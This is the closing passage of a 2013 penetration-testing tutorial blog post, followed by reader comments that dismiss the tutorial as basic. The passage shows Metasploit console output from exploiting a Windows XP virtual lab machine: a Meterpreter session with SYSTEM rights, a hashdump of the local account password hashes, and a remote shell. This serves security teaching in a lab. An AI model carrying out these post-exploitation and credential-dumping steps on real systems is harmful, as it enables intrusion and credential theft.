[*] Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] Attempting to trigger the vulnerability…
[*] Sending stage (751104 bytes) to 192.168.56.103
[*] Meterpreter session 1 opened (192.168.56.1:4444 -> 192.168.56.103:1079) at 2013-06-18 22:14:33 +0300
meterpreter > getuid
Server username: NT AUTHORITYSYSTEM
meterpreter > sysinfo
Computer : WINDOWSX-C7B000
OS : Windows XP (Build 2600, Service Pack 2).
Architecture : x86
System Language : en_US
Meterpreter : x86/win32
meterpreter > hashdump
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
HelpAssistant:1000:4b96c75b8d843a7ae69de05670f84236:d9178fd3b70a6bb945b5f1b67c6bf645:::
IUSR_WINDOWSX-C7B000:1004:7a68662f527f18a87dfe407d970d780e:199fc7a3f00b00d8da81a66e4507e55b:::
IWAM_WINDOWSX-C7B000:1005:27ffb5fdfeafa462d92e514086f08077:954f0124f93780ce8d43ffcda157a567:::
SUPPORT_388945a0:1002:aad3b435b51404eeaad3b435b51404ee:603e6ae218ff6a77a3d7c9a519b93df7:::
windowsxp:1003:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
meterpreter > shell
Process 1908 created.
Channel 1 created.
Microsoft Windows XP [Version 5.1.2600]
(C) Copyright 1985-2001 Microsoft Corp.
C:WINDOWSsystem32>systeminfo
systeminfo
Host Name: WINDOWSX-C7B000
OS Name: Microsoft Windows XP Professional
OS Version: 5.1.2600 Service Pack 2 Build 2600
OS Manufacturer: Microsoft Corporation
OS Configuration: Standalone Workstation
OS Build Type: Uniprocessor Free
Registered Owner: windowsxp
Registered Organization:
Product ID: 76487-640-8365391-23703
Original Install Date: 6/10/2013, 1:02:40 PM
System Up Time: 0 Days, 2 Hours, 4 Minutes, 1 Seconds
System Manufacturer: innotek GmbH
System Model: VirtualBox
System type: X86-based PC
Processor(s): 1 Processor(s) Installed.
[01]: x86 Family 6 Model 58 Stepping 9 GenuineIntel ~2484 Mhz
BIOS Version: VBOX – 1
Windows Directory: C:WINDOWS
System Directory: C:WINDOWSsystem32
Boot Device: DeviceHarddiskVolume1
System Locale: en-us;English (United States)
Input Locale: en-us;English (United States)
Time Zone: (GMT+02:00) Athens, Beirut, Istanbul, Minsk
Total Physical Memory: 511 MB
Available Physical Memory: 370 MB
Virtual Memory: Max Size: 2,048 MB
Virtual Memory: Available: 2,009 MB
Virtual Memory: In Use: 39 MB
Page File Location(s): C:pagefile.sys
Domain: WORKGROUP
Logon Server: N/A
Hotfix(s): 1 Hotfix(s) Installed.
[01]: Q147222
NetWork Card(s): 1 NIC(s) Installed.
[01]: AMD PCNET Family PCI Ethernet Adapter
Connection Name: Local Area Connection
DHCP Enabled: No
IP address(es)
[01]: 192.168.56.103
[/c]

Conclusion

There are a lot of ways and things we can do to enumerate and exploit vulnerable web-apps or services. This tutorial describes the basic things we can do to gather important information and exploit the most known vulnerable services using a couple of ways. The best secure way is to try every parameter on a virtual environment, before proceeding to run every of the above example, to real machine Servers with authorized access by the admin.

Posted: June 27, 2013
Articles Author
Fotis Liatsis
View Profile

Fotis Liatsis is an undergraduate at Technological Educational Institute of Larissa, department of Computer Science and Telecommunications. He is also a member and System/Network Administrator of Greek Student Security Team - CampSec. Fotis is an OWASP member of the Greek Student Chapter, System Administrator of Hackademic and also a member of the Digital Awareness and Reinforcement of Trust (D.A.R.T. NGO) team. His interests include Ethical Hacking, Penetration Testing, Security/vulnerability research and applied Cryptography methods. He is a security enthusiast and Athcon fanatic. You can follow his Twitter (@liatsisfotis) or his blog for more information (http://www.liatsisfotis.com/)

6 responses to “Exploitation Ubuntu – Windows Services”

  1. Consultuning says:

    Color me unimpressed. So you take as an example a service (Tomcat) that is not intended for production use and “find” a “vulnerability” consisting in using its well documented defaults.

    Really great, makes me think of “Ethical hacking training” as “this is the list of commands you have to run”, which avoids anyone reading any documentation, or actually knowing what they are doing. Or even why.

    I had seen in my feed lots of articles from this site lately but never bothered to read them. For once, I took the chance to read it this time and found it a complete waste of time.

    Please, find a non trivial vulnerability and then explain which tools and techniques you’ve used to find it. Then we can see your services as little more than tutorials on using freely available packages and programs.

    Perhaps your organization is full of really great people that actually know what they are doing, but articles at this level of articles is not going to create that impression.

  2. Constantin Ionel says:

    Really great! Thanks!

  3. wizard32 says:

    Consultuning thanks for your comment. As i say my tutorial describes the basic principles of gathering information. How to determine an open port using multiple tools (This tutorials describes the nmap-nikto tools). Also the part of gathering information is one of the most important part of Penetration Testing. My tutorials saws how to exploit an windows machine which runs a vulnerable smb service. About Tomcat, there are a lot of machines which runs old versions of this Apache Server. I explain the way (two ways, metasploit, web-service) of exploitation and a couple of simple commands to gather information about the victim machine and is not “this is the list of commands you have to run” because i could describe more complicated commands like create user, give root access to the specific user etc.

    P.S. My Tutorials explains the basic step to learn how to think when you want to gather infos about a machine and how to penetrate it.

  4. null says:

    I wholeheartedly agree with the above poster. This is rudimentary stuff. Do something interesting, not something thats been done 1000 times and is even included in metasploitable, the ridiculously vulnerable linux OS made for beginners to the MSF framework. yawn*

  5. kanishka says:

    Nice information for beginner like me.

  6. rootbrain says:

    Lets say that your tutorial is OK…

    Do you think that you know how to think? No… Absolute NO.

    This stuff is made not even for the first semester’s of a cs student…
    Come on, you get something too common and tested it for yourself and then you wrote this??? (i am sure that you saw this in youtube, there are a lot of videos out there).

    This is what you call Security/vulnerability research ??? or Ethical Hacking???

    All of your tutorials in your blog are a waste of time, find something really interesting ….

Leave a Reply

Your email address will not be published. Required fields are marked *